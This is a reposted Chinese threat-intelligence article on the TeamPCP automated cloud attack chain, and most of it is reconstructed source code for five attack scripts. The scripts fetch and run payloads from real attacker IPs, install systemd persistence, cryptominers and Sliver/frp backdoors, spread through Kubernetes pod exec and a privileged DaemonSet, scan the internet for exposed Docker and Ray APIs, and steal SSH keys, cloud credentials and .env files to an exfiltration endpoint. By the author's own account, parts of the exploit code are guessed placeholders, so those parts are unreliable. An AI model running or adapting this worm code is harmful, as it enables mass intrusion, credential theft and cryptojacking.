文章总结: 文档分析了黑客团伙TeamPCP针对云主机的自动化攻击链,涵盖五个攻击阶段和五个关键脚本的功能解析。攻击者通过配置不当的Docker容器入侵,利用proxy.sh脚本实现持久化、部署挖矿程序和后门,通过kube.py在K8s集群横向移动,利用react.py结合CVE-2025-29927漏洞窃取凭据。文章提供了完整的脚本还原与行为分析,揭示了黑产自动化的技术路径。 综合评分: 83 文章分类: 恶意软件,云安全,威胁情报,漏洞分析,应急响应
云主机自动沦陷成为黑产节点,黑客利用5个脚本全自动实现
原创
suntiger suntiger
二进制空间安全
2026年2月22日 11:45 北京
将二进制空间安全设为”星标⭐️”
第一时间收到文章更新
技术背景
#
黑客团伙(TeamPCP)的整个攻击过程分为五个阶段, 包括:攻击准备、入口突破、加载首个恶意脚本、黑产服务安装、自动扩散。黑客团伙为了行动隐蔽和防溯源, 主要利用Telegram群组频道进行动态发布、私聊指挥行动,买卖窃取的数据或访问权限。利用TOR(洋葱)网络隐藏真实服务器位置、托管C2面板、Sliver下载页,降低被溯源、封禁的风险。黑客维护了两台Sliver C2下载服务器,而攻击链从Docker切入,主要通过自动扫描配置不当的Alpine容器作为首次立足点,当入侵首个Alpine容器后,黑客会在目标中部署并执行脚本proxy.sh,该脚本会部署加密货币挖矿程序、安装系统服务、后门、并从下载服务器上拉取4个脚本进行数据窃取和自动扩散,整体架构图如下:
#
proxy.sh脚本功能
#
proxy.sh脚本被执行后会同时做多项工作,包括:在宿主机或容器内注册系统服务,实现持久化或更深层控制; 部署加密货币挖矿程序,利用被控环境算力进行挖矿; 部署后门,便于攻击者后续再次接入和控制; 从两台服务器(67.217.57.240、44.252.85.168)下载脚本并投放到当前环境,脚本文件包括: kube.sh或kube.py、react.py(React2Shell利用与数据窃取)、pcpcat.py或teampcp.py(扫描与部署)、redis-deploy.py(redis利用)、scanner.py(发现新目标)。其脚本内容归类总结如下:
#!/bin/sh# =============================================================================# proxy.sh - TeamPCP 攻击链主控脚本# 功能:① 安装系统服务 ② 部署加密货币挖矿程序 ③ 部署后门 ④ 从下载服务器拉取并投放脚本# =============================================================================
# 两台下载服务器(图中与报告一致)SRV1="http://67.217.57.240:666"SRV2="http://44.252.85.168:666"FILES="${SRV2}/files"# 工作目录:宿主机或容器内可写路径dir="${dir:-/tmp/teampcp}"mkdir -p "$dir" 2>/dev/null
# ---------- ④ 从下载服务器拉取并投放脚本(先拉取,后续会用到) ----------# 图中:从 67.217.57.240、44.252.85.168 下载并投放到当前环境fetchScript() { _url="$1" _name="$2" curl -fsSL "$_url" -o "${dir}/${_name}" 2>/dev/null && chmod +x "${dir}/${_name}" 2>/dev/null}fetchScript "${FILES}/kube.py" "kube.py"fetchScript "${FILES}/react.py" "react.py"fetchScript "${FILES}/teampcp.py" "teampcp.py"fetchScript "${FILES}/pcpcat.py" "pcpcat.py"fetchScript "${FILES}/redis-deploy.py" "redis-deploy.py"fetchScript "${FILES}/scanner.py" "scanner.py"
# ---------- ① 安装系统服务(宿主机或容器内注册,实现持久化或更深层控制) ----------installSystemServices() { if [ ! -d /etc/systemd/system ]; then return fi # 1) PCPcat React 扫描器服务 cat > /etc/systemd/system/teampcp-react.service << SVCEOF[Unit]Description=PCPcat React ScannerAfter=network.target[Service]Type=simpleWorkingDirectory=${dir}ExecStart=/usr/bin/python3 ${dir}/react.pyRestart=alwaysRestartSec=60[Install]WantedBy=multi-user.targetSVCEOF systemctl daemon-reload 2>/dev/null systemctl enable teampcp-react.service 2>/dev/null systemctl start teampcp-react.service 2>/dev/null if [ -f "${dir}/scanner.py" ]; then cat > /etc/systemd/system/teampcp-scanner.service << SVCEOF2[Unit]Description=PCPcat ScannerAfter=network.target[Service]Type=simpleWorkingDirectory=${dir}ExecStart=/usr/bin/python3 ${dir}/scanner.pyRestart=alwaysRestartSec=120[Install]WantedBy=multi-user.targetSVCEOF2 systemctl daemon-reload 2>/dev/null systemctl enable teampcp-scanner.service 2>/dev/null systemctl start teampcp-scanner.service 2>/dev/null fi}installSystemServices
# ---------- ② 部署加密货币挖矿程序(利用被控环境算力进行挖矿) ----------deployCryptominer() { _url="${FILES}/BORING_SYSTEM" _out="${dir}/BORING_SYSTEM" curl -fsSL "$_url" -o "$_out" 2>/dev/null || true if [ -f "$_out" ]; then chmod +x "$_out" 2>/dev/null ( "$_out" & ) 2>/dev/null fi _miner_url="${FILES}/mine.sh" _miner_out="${dir}/mine.sh" curl -fsSL "$_miner_url" -o "$_miner_out" 2>/dev/null || true if [ -f "$_miner_out" ]; then chmod +x "$_miner_out" 2>/dev/null ( sh "$_miner_out" & ) 2>/dev/null fi}deployCryptominer
# ---------- ③ 部署后门(便于攻击者后续再次接入与控制) ----------deployBackdoor() { for _base in "$SRV1" "$SRV2"; do _frps="${_base}/files/frps" _gost="${_base}/files/gost" _sliver="${_base}/files/sliver" for _url in "$_frps" "$_gost" "$_sliver"; do _name=$(basename "$_url") _path="${dir}/${_name}" curl -fsSL "$_url" -o "$_path" 2>/dev/null && chmod +x "$_path" 2>/dev/null && ( "$_path" & ) 2>/dev/null done done}deployBackdoor
# ---------- K8s 环境检测:若在集群内则拉取并执行 kube.py(横向移动) ----------if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then fetchScript "${FILES}/kube.py" "k8s.py" [ -f "${dir}/k8s.py" ] && python3 "${dir}/k8s.py" 2>/dev/null &fi
# ---------- ④ 续:拉取脚本后,在后台启动扫描/发现类脚本(发现新目标) ----------[ -f "${dir}/teampcp.py" ] && ( python3 "${dir}/teampcp.py" & ) 2>/dev/null[ -f "${dir}/pcpcat.py" ] && ( python3 "${dir}/pcpcat.py" & ) 2>/dev/null[ -f "${dir}/redis-deploy.py" ] && ( python3 "${dir}/redis-deploy.py" & ) 2>/dev/null
#
kube.py脚本功能
#
kube.py脚本作用是在检测到K8s环境时由proxy.sh拉取执行;做集群内横向移动并建立持久化。其行为包括:利用集群内serviceaccount等凭据,通过K8s API枚举 namespace、pod 等。对每个pod调用exec接口,在容器内执行:curl -fsSL <PROXY_URL> | bash(即再次拉取并执行 proxy.sh),把整个集群变成可自我扩散的“扫描/代理网”。在集群中部署DaemonSet(如名称 system-monitor,命名空间 kube-system),实现持久化与宿主机级控制,其核心内容如下:
# -*- coding: utf-8 -*-# =============================================================================# kube.py - TeamPCP K8s 集群内横向移动与持久化# =============================================================================
import urllib.requestimport ssl
PROXY_URL = "http://44.252.85.168:666/files/proxy.sh"
def spread_to_pods(): """对每个 pod 调用 exec,在容器内执行 curl proxy.sh | bash""" for pod in pods: try: pod_name = pod['metadata']['name'] namespace = pod['metadata']['namespace'] exec_url = f"{api_url}/api/v1/namespaces/{namespace}/pods/{pod_name}/exec" exec_url += f"?command=sh&command=-c&command=curl+-fsSL+{PROXY_URL}+|+bash" exec_url += "&stdout=true&stderr=true" req = urllib.request.Request(exec_url, method='POST') with urllib.request.urlopen(req, context=ctx, timeout=30) as resp: pass continue except Exception as e: continue
# ---- DaemonSet:在每节点部署特权Pod,挂载宿主机并再次拉取proxy.sh ----daemonset = { "apiVersion": "apps/v1", "kind": "DaemonSet", "metadata": { "name": "system-monitor", "namespace": "kube-system" }, "spec": { "selector": { "matchLabels": { "app": "system-monitor" } }, "template": { "metadata": { "labels": { "app": "system-monitor" } }, "spec": { "hostNetwork": True, "hostPID": True, "containers": [ { "name": "monitor", "image": "alpine:latest", "command": [ "sh", "-c", "apk add curl bash python3 >/dev/null 2>&1; " "curl -fsSL " + PROXY_URL + " | bash; " "sleep infinity" ], "securityContext": { "privileged": True }, "volumeMounts": [ { "name": "host", "mountPath": "/host" } ] } ], "volumes": [ { "name": "host", "hostPath": { "path": "/" } } ] } } }}
#
react.py脚本功能
#
react.py脚本针对存在 CVE-2025-29927(React2Shell)的 React/Next.js 应用,实现远程命令执行、窃取敏感数据并投递下一阶段。具体行为包括:(1).从攻击者控制的 API 拉取目标域名列表。(2).构造特制 Next.js 请求(如 multipart 表单 + 框架相关头),触发服务端执行并通过重定向元数据取回命令输出。(3).执行成功后,在目标上跑一系列命令收集:环境变量、.env 类文件、Git 凭据、多用户 SSH 密钥、云厂商凭据、基础主机信息等,并回传到同一控制 API。(4).窃取完成后,尝试投递二级载荷:通过 apk/apt/yum/curl/wget/python 等下载并执行远程脚本,用于持久化或代理。其脚本还原内容如下:
# -*- coding: utf-8 -*-# 功能摘要:# - 从中心 API 拉取目标域名,利用 CVE-2025-29927 实现远程命令执行# - 通过特制 Next.js 请求(multipart + 框架头)触发服务端执行,经重定向元数据取回输出# - 窃取 .env、环境变量、Git 凭据、SSH 密钥、云凭据、主机信息并回传至同一控制 API# - 成功后按目标 OS(apk/apt/yum)下载并执行远程脚本,建立持久化或代理# =============================================================================
import urllib.requestimport urllib.errorimport sslimport jsonimport re
# control_host 可能同时提供:目标列表、回传接收、二级载荷CONTROL_BASE = "http://44.252.85.168:666"TARGETS_API = f"{CONTROL_BASE}/api/targets" # 拉取目标域名列表EXFIL_API = f"{CONTROL_BASE}/api/exfil" # 回传窃取数据PAYLOAD_URL = f"{CONTROL_BASE}/files/proxy.sh" # 二级载荷,用于持久化或代理
# 忽略 SSL 校验证书ctx = ssl.create_default_context()ctx.check_hostname = Falsectx.verify_mode = ssl.CERT_NONE
def getTargets(): # getTargets - 从中心 API 拉取待攻击域名列表 try: req = urllib.request.Request(TARGETS_API) with urllib.request.urlopen(req, context=ctx, timeout=30) as resp: data = resp.read().decode("utf-8", errors="ignore") # 假定返回 JSON 数组或每行一域名的文本 try: return json.loads(data) except json.JSONDecodeError: return [line.strip() for line in data.splitlines() if line.strip()] except Exception: return []
def runRemoteCmd(domain, cmd, baseUrl=None): # runRemoteCmd - 在目标域名上通过 React2Shell 执行命令并取回输出 # 参数: domain 目标域名, cmd 要执行的 shell 命令, baseUrl 可选(如 https://domain.com) # 返回: 命令输出文本,失败返回 None baseUrl = baseUrl or ("https://" + domain if not domain.startswith("http") else domain) # CVE-2025-29927(React2Shell):构造特制 Next.js 请求 # 报告中:multipart form data + framework-specific headers,触发服务端执行,经 redirect 元数据取回输出 # 真实漏洞端点、表单字段名及输出回传方式未公开,以下为依描述还原的合理结构 url = baseUrl.rstrip("/") + "/api/route" # 占位;实际路径依 Next.js 与漏洞端点而定 payload = ( b'------WebKitFormBoundary\r\n' b'Content-Disposition: form-data; name="field"; filename="x"\r\n\r\n' + cmd.encode("utf-8") + b'\r\n------WebKitFormBoundary--' ) req = urllib.request.Request( url, data=payload, method="POST", headers={ "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundary", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36", }, ) try: with urllib.request.urlopen(req, context=ctx, timeout=15) as resp: # 若输出在响应体则直接读;若在 Location 或自定义头则需解析 body = resp.read().decode("utf-8", errors="ignore") # 尝试从重定向或响应中提取输出(示例:可能编码在 Location 或 JSON 中) match = re.search(r"output=([^&\s]+)", body) or re.search(r'"output"\s*:\s*"([^"]*)"', body) if match: return urllib.request.unquote(match.group(1)) return body[:8192] if body else None except urllib.error.HTTPError as e: # 部分利用链可能通过错误页或 302 携带输出 if e.code == 302 and e.headers.get("Location"): return e.headers.get("Location", "") return e.read().decode("utf-8", errors="ignore")[:8192] if e.fp else None except Exception: return None
def getHarvestCommands(): # getHarvestCommands - 返回用于窃取敏感数据的命令列表(每条在目标上执行后取回输出) return [ "cat .env .env.local .env.* 2>/dev/null", "printenv", "git config --list 2>/dev/null", "cat /root/.ssh/id_rsa /root/.ssh/id_ed25519 /home/*/.ssh/id_rsa /home/*/.ssh/id_ed25519 2>/dev/null", "cat /root/.aws/credentials /home/*/.aws/credentials 2>/dev/null", "cat /root/.config/gcloud/credentials.json /home/*/.config/gcloud/*.json 2>/dev/null", "hostname; uname -a; id; whoami", ]
def harvestAndExfil(domain, runCmd): # harvestAndExfil - 在已取得 RCE 的目标上执行窃取命令,并将结果回传至控制 API # 参数: domain 当前目标域名, runCmd 可调用 runRemoteCmd(domain, cmd) 的函数 results = {"domain": domain, "harvest": {}} for i, cmd in enumerate(getHarvestCommands()): out = runCmd(cmd) if out: results["harvest"]["cmd_%d" % i] = out[:65535] if not results["harvest"]: return try: data = json.dumps(results).encode("utf-8") req = urllib.request.Request( EXFIL_API, data=data, method="POST", headers={"Content-Type": "application/json"}, ) urllib.request.urlopen(req, context=ctx, timeout=30) except Exception: pass
def deploySecondary(domain, runCmd): # deploySecondary - 在目标上下载并执行远程脚本,建立持久化或访问代理 # 报告中:通过 apk/apt/yum/curl/wget/python 等按 OS 选择方式下载执行 bootstrap = ( "apk add --no-cache curl 2>/dev/null || apt-get install -y curl 2>/dev/null || yum install -y curl 2>/dev/null; " "curl -fsSL '%s' | sh 2>/dev/null || wget -qO- '%s' | sh 2>/dev/null || python3 -c \"import urllib.request; exec(urllib.request.urlopen('%s').read().decode())\" 2>/dev/null" ) % (PAYLOAD_URL, PAYLOAD_URL, PAYLOAD_URL) runCmd(bootstrap)
def main(): # main - 主流程:拉取目标 → 利用 React2Shell 执行命令 → 窃取并回传 → 投递二级载荷 targets = getTargets() for domain in targets: if not domain: continue # 探测是否可利用:执行 id 或 echo out = runRemoteCmd(domain, "id") if not out: out = runRemoteCmd(domain, "echo 1") if out: harvestAndExfil(domain, lambda cmd: runRemoteCmd(domain, cmd)) deploySecondary(domain, lambda cmd: runRemoteCmd(domain, cmd))
if __name__ == "__main__": main()
以下是TeamPCP窃取到的数据:
#
#
pcpcat.py脚本功能
#
pcpcat.py脚本主要用来在互联网上大规模发现暴露的Docker API、Ray管理界面,并自动部署恶意容器或Ray 任务(云蠕虫式扩散)。其行为包括:(1).从公网或 GitHub(如 DeadCatx3)等拉取大量CIDR,对大量IP做并行扫描(常见 Docker、Ray 端口)。(2).校验端点是否真的可被利用(未授权管理 API),然后通过 API 远程创建负载。(3).Docker:拉取Alpine镜像,启动宿主机网络、自动重启的容器,在容器内拉取并执行远程脚本(与 proxy.sh 拉取命令一致)。 (4).Ray:提交任务,执行 base64 编码的引导载荷(可含挖矿等)。 脚本参考代码如下:
# -*- coding: utf-8 -*-# =============================================================================# pcpcat.py - TeamPCP 大流量互联网扫描与部署:发现暴露的 Docker API / Ray,并自动部署恶意容器或任务# 根据“Analysis of pcpcat.py”功能描述还原:大规模发现、自动校验、无交互部署、重启策略持久化# =============================================================================# 设计:云蠕虫式——将配置不当的编排端点转化为分布式立足点,无需凭据,仅利用暴露的管理接口# =============================================================================
import urllib.requestimport urllib.errorimport sslimport jsonimport socketimport ipaddressimport base64import concurrent.futures
# 拉取并执行 proxy.sh 的地址(与 proxy.sh、scanner 一致)PROXY_SCRIPT_URL = "http://67.217.57.240:666/files/proxy.sh"PROXY_SCRIPT_URL_ALT = "http://44.252.85.168:666/files/proxy.sh"
# 公网 CIDR 来源(图中:从 public provider lists 获取大量 CIDR)# 示例:云厂商公布的 IP 段或 DeadCatx3 等列表CIDR_SOURCES = [ "https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt", # 可扩展:AWS/GCP/Azure 等 IP 范围 JSON]FALLBACK_CIDRS = ["0.0.0.0/0"]
# Docker / Ray 常见端口DOCKER_PORTS = [2375, 2376]RAY_PORTS = [8265, 6379]
# 并行扫描线程数MAX_WORKERS = 64CONNECT_TIMEOUT = 2API_TIMEOUT = 5
ctx = ssl.create_default_context()ctx.check_hostname = Falsectx.verify_mode = ssl.CERT_NONE
def get_docker_startup_script(): """返回在容器内拉取并执行 proxy.sh 的 shell 脚本(与野外样本一致)。""" return f'''/bin/shecho "https://t.me/Persy_PCP was herehttps://t.me/teampcp"apk add --no-cache curl bash python3 >/dev/null 2>&1curl -fsSL "{PROXY_SCRIPT_URL}" | bash'''
def deploy_to_docker(ip, port): """ 对暴露的 Docker API (ip:port) 部署恶意容器。 行为:拉取 Alpine 镜像,启动宿主机网络、自动重启的容器,容器内拉取并执行远程脚本(proxy.sh)。 """ endpoint = f"{ip}:{port}" base_url = f"http://{ip}:{port}" script = get_docker_startup_script().strip().replace("\n", " ") body = { "Image": "alpine:latest", "Cmd": ["/bin/sh", "-c", script], "HostConfig": { "NetworkMode": "host", "RestartPolicy": {"Name": "always"}, }, } try: req = urllib.request.Request( f"{base_url}/containers/create", data=json.dumps(body).encode(), method="POST", headers={"Content-Type": "application/json"}, ) with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp: create_res = json.loads(resp.read().decode()) cid = create_res.get("Id") if not cid: return False start_req = urllib.request.Request( f"{base_url}/containers/{cid}/start", data=b"", method="POST", ) urllib.request.urlopen(start_req, context=ctx, timeout=API_TIMEOUT) return True except Exception: return False
def get_ray_bootstrap_b64(): """返回 Ray 任务中执行的 base64 引导载荷""" # 占位:解码后可为拉取 proxy.sh 或挖矿脚本;真实样本中为完整编码 script = "import urllib.request, ssl; ctx=ssl.create_default_context(); ctx.check_hostname=False; ctx.verify_mode=0; exec(urllib.request.urlopen('" + PROXY_SCRIPT_URL + "', context=ctx).read().decode())" return base64.b64encode(script.encode()).decode()
def deploy_to_ray(ip, port): """ 向 Ray dashboard 提交任务,执行 base64 编码的引导载荷。 Ray 常见 API:POST /api/jobs 或 /api/serve/applications 等,此处为占位路径。 """ base_url = f"http://{ip}:{port}" bootstrap_b64 = get_ray_bootstrap_b64() # Ray 1.x / 2.x 提交 job 的请求体格式因版本而异,此处为合理推测 body = { "entrypoint": f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\"", "runtime_env": {}, } try: for path in ["/api/jobs", "/api/version", "/"]: req = urllib.request.Request( f"{base_url}{path}", data=json.dumps(body).encode(), method="POST", headers={"Content-Type": "application/json"}, ) try: with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp: if resp.getcode() in (200, 201, 202): return True except urllib.error.HTTPError as e: if e.code in (200, 201, 202): return True except Exception: pass return False
def fetch_cidr_blocks(): """从公网 provider 列表获取大量 CIDR(图中:acquires massive CIDR blocks from public provider lists)。""" all_cidrs = [] for url in CIDR_SOURCES: try: req = urllib.request.Request(url) with urllib.request.urlopen(req, context=ctx, timeout=15) as resp: text = resp.read().decode("utf-8", errors="ignore") for line in text.splitlines(): line = line.strip() if line and not line.startswith("#"): all_cidrs.append(line) except Exception: continue return all_cidrs if all_cidrs else FALLBACK_CIDRS
def expand_cidr(cidr, limit=2048): """将 CIDR 展开为 IP 列表,限制数量以控制扫描规模。""" try: net = ipaddress.ip_network(cidr, strict=False) return [str(ip) for ip in list(net.hosts())[:limit]] except Exception: return []
def check_port(ip, port): """检测 ip:port 是否开放。""" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(CONNECT_TIMEOUT) r = s.connect_ex((ip, port)) s.close() return r == 0 except Exception: return False
def verify_docker(ip, port): """校验是否为可滥用的未授权 Docker API。""" try: req = urllib.request.Request(f"http://{ip}:{port}/version") with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp: return resp.getcode() == 200 except Exception: return False
def verify_ray(ip, port): """校验是否为可用的 Ray dashboard / API。""" try: req = urllib.request.Request(f"http://{ip}:{port}/") with urllib.request.urlopen(req, context=ctx, timeout=API_TIMEOUT) as resp: return resp.getcode() in (200, 401, 403) except Exception: return False
def scan_one(args): """单任务:对 (ip, port, kind) 做端口与 API 校验,返回可攻击目标。""" ip, port, kind = args if not check_port(ip, port): return None if kind == "docker" and verify_docker(ip, port): return (ip, port, "docker") if kind == "ray" and verify_ray(ip, port): return (ip, port, "ray") return None
def main(): # 1) 大规模发现:获取 CIDR,展开为大量 IP,并行扫描 Docker / Ray 端口 cidrs = fetch_cidr_blocks() tasks = [] for cidr in cidrs: for ip in expand_cidr(cidr): for port in DOCKER_PORTS: tasks.append((ip, port, "docker")) for port in RAY_PORTS: tasks.append((ip, port, "ray"))
found = [] with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as ex: for res in concurrent.futures.as_completed([ex.submit(scan_one, t) for t in tasks]): try: r = res.result() if r: found.append(r) except Exception: pass
# 2) 无交互部署:对每个验证通过的目标调用对应部署逻辑,持久化依赖 restart policy(Docker)/ job(Ray) for ip, port, kind in found: if kind == "docker": deploy_to_docker(ip, port) elif kind == "ray": deploy_to_ray(ip, port)
if __name__ == "__main__": main()
#
#
scanner.py脚本功能
#
scanner.py脚本主要用来发现配置不当的Docker API 与 Ray dashboard,并可选部署恶意负载或挖矿。其行为包括:(1).从 GitHub 账号 DeadCatx3 等处下载 CIDR 列表,用于扫描目标段。(2).包含与 pcpcat 类似的 **Docker 部署逻辑**:生成拉取并执行 proxy.sh 的启动脚本(与野外容器内执行的命令一致),对指定 ip:port 进行部署。(3).“boring” 服务器选项:会投递 base64 编码的引导脚本;解码后为挖矿相关(如 XMRig)。以下是脚本的部分参考代码:
# -*- coding: utf-8 -*-# =============================================================================# scanner.py - TeamPCP 扫描器:发现配置不当的 Docker API 与 Ray dashboard,并部署 proxy 或挖矿# =============================================================================
import urllib.requestimport urllib.errorimport sslimport jsonimport socketimport ipaddressimport threadingimport base64
# 下载服务器(与 proxy.sh 一致)PROXY_SCRIPT_URL = "http://67.217.57.240:666/files/proxy.sh"# 备用PROXY_SCRIPT_URL_ALT = "http://44.252.85.168:666/files/proxy.sh"
# DeadCatx3 GitHub:CIDR 列表(报告中未给出具体 repo 路径,此处为占位)CIDR_LIST_URL = "https://raw.githubusercontent.com/DeadCatx3/cidr/main/cidr.txt"# 若 GitHub 不可用,可使用内置或其它源FALLBACK_CIDRS = ["0.0.0.0/0"]
# Docker / Ray 常见暴露端口DOCKER_PORTS = [2375, 2376]RAY_PORTS = [8265, 6379]
ctx = ssl.create_default_context()ctx.check_hostname = Falsectx.verify_mode = ssl.CERT_NONE
# -----------------------------------------------------------------------------# mine.sh 配置与用法(图中:XMRig 安装脚本)# mine.sh 用法:./miner | ./miner uninstall | ./miner status | ./miner logs | ./miner run | --help | --version# -----------------------------------------------------------------------------MINE_CONFIG = { "WALLET_ADDRESS": "87ttvHnjsno56u3zJV26E6cu6Cfro8ASBSpmAzi6FzGp603KXsoB2r8aR2k82Pmg2SLWHtHCKjrHeHUcZUneqEBFRnkbaz5", "WORKER_NAME": "${WORKER_NAME:-$(hostname)}", "POOL_URL": "pool.supportxmr.com:443", "XMRIG_VERSION": "6.25.0", "CPU_PERCENT": "${CPU_PERCENT:-60}", "BINARY_NAME": "miner",}
def get_docker_startup_script(): """返回在 Docker 容器内拉取并执行 proxy.sh 的启动脚本(与野外样本一致)。""" return f'''/bin/shecho "https://t.me/Persy_PCP was herehttps://t.me/teampcp"apk add --no-cache curl bash python3 >/dev/null 2>&1curl -fsSL "{PROXY_SCRIPT_URL}" | bash'''
def deploy_to_docker(ip, port, use_boring=False): """ 对暴露的 Docker API (ip:port) 部署恶意容器。 use_boring=True 时部署挖矿引导(base64 xmrig)而非 proxy.sh。 """ endpoint = f"{ip}:{port}" base_url = f"http://{ip}:{port}" if use_boring: # “boring” 服务器选项:投递 base64 编码的挖矿引导 # 解码后执行会写入 /tmp/miner.b64 → base64 -d → chmod +x /tmp/miner → 执行 bootstrap_b64 = get_bootstrap_b64_miner() cmd = ["/bin/sh", "-c", f"python3 -c \"import base64; exec(base64.b64decode('{bootstrap_b64}').decode())\""] else: script = get_docker_startup_script().strip().replace("\n", " ") cmd = ["/bin/sh", "-c", script] body = { "Image": "alpine:latest", "Cmd": cmd, "HostConfig": { "NetworkMode": "host", "RestartPolicy": {"Name": "always"}, }, } try: req = urllib.request.Request( f"{base_url}/containers/create", data=json.dumps(body).encode(), method="POST", headers={"Content-Type": "application/json"}, ) with urllib.request.urlopen(req, context=ctx, timeout=10) as resp: create_res = json.loads(resp.read().decode()) cid = create_res.get("Id") if not cid: return False start_req = urllib.request.Request( f"{base_url}/containers/{cid}/start", data=b"", method="POST", ) urllib.request.urlopen(start_req, context=ctx, timeout=5) return True except Exception: return False
def get_bootstrap_b64_miner(): """ 返回“挖矿引导”的 base64 字符串 此处返回占位或从远程拉取的b64,真实样本中为完整编码的引导脚本。 """ # 占位:一段仅写 /tmp/miner.b64 并解码执行的最小示例 bootstrap_script = """import base64, subprocess, osp = os.environ.get('MINER_B64', '')if p: open('/tmp/miner.b64', 'wb').write(base64.b64decode(p)) subprocess.run(['sh', '-c', 'base64 -d /tmp/miner.b64 > /tmp/miner && chmod +x /tmp/miner && rm -f /tmp/miner.b64 && /tmp/miner'], check=False)""" return base64.b64encode(bootstrap_script.encode()).decode()
def fetch_cidr_list(): """从 GitHub DeadCatx3 拉取 CIDR 列表;失败则返回备用网段。""" try: req = urllib.request.Request(CIDR_LIST_URL) with urllib.request.urlopen(req, context=ctx, timeout=15) as resp: text = resp.read().decode("utf-8", errors="ignore") return [line.strip() for line in text.splitlines() if line.strip()] except Exception: return FALLBACK_CIDRS
def expand_cidr(cidr): """将单个 CIDR 展开为 IP 列表(示例中可限制数量以控制扫描规模)。""" try: net = ipaddress.ip_network(cidr, strict=False) return [str(ip) for ip in net.hosts()][:1024] except Exception: return []
def check_port(ip, port, timeout=2): """检测 ip:port 是否开放。""" try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.settimeout(timeout) r = s.connect_ex((ip, port)) s.close() return r == 0 except Exception: return False
def check_docker_api(ip, port): """检测是否为未授权 Docker API(简单 GET /version)。""" try: req = urllib.request.Request(f"http://{ip}:{port}/version") with urllib.request.urlopen(req, context=ctx, timeout=5) as resp: return resp.getcode() == 200 except Exception: return False
def check_ray_dashboard(ip, port): """检测是否为 Ray dashboard(简单 GET)。""" try: req = urllib.request.Request(f"http://{ip}:{port}/") with urllib.request.urlopen(req, context=ctx, timeout=5) as resp: return resp.getcode() in (200, 401, 403) except Exception: return False
def scan_and_deploy(use_boring=False): """ 主流程:拉取 CIDR → 扫描 Docker / Ray 端口 → 对可用目标执行 deploy_to_docker(或 Ray)。 use_boring=True 时对 Docker 目标部署挖矿引导(base64 xmrig),否则部署 proxy.sh。 """ cidrs = fetch_cidr_list() found = [] for cidr in cidrs: for ip in expand_cidr(cidr): for port in DOCKER_PORTS: if check_port(ip, port) and check_docker_api(ip, port): found.append((ip, port, "docker")) for port in RAY_PORTS: if check_port(ip, port): found.append((ip, port, "ray")) for ip, port, kind in found: if kind == "docker": deploy_to_docker(ip, port, use_boring=use_boring)
def main(): import sys use_boring = "--boring" in sys.argv scan_and_deploy(use_boring=use_boring)
if __name__ == "__main__": main()
#
(全文完)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:二进制空间安全 suntiger suntiger《云主机自动沦陷成为黑产节点,黑客利用5个脚本全自动实现》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。











评论